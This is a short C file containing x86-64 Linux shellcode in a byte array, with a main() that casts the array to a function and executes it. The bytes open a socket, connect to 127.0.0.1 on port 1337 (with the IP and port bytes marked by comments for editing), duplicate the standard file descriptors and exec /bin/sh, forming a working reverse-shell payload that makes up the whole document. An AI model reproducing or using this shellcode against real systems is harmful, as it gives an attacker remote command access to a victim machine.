char scp[] = 
"\x48\x31\xC0\x99\x6A\x01\x5E\x6A\x02\x5F\xB0\x29\x0F\x05\xB2\x10\x48\xBF\x02\x00"
"\x05\x39" //port 1337
"\x7F\x00\x00\x01" //ip
"\x57\x54\x5E\x50\x5F\xB0\x2A\x0F\x05\x6A\x03\x5E\x26\x48\xFF\xCE\xB0\x21\x0F\x05\x75\xF7\x48\xBB\x2F\x62\x69\x6E\x2F\x73\x68\x00\x53\x54\x5F\x99\x52\x57\x54\x5E\xB0\x3B\x0F\x05";

int main(void)
{
    (*(void(*)()) scp)();
    return 0;
}
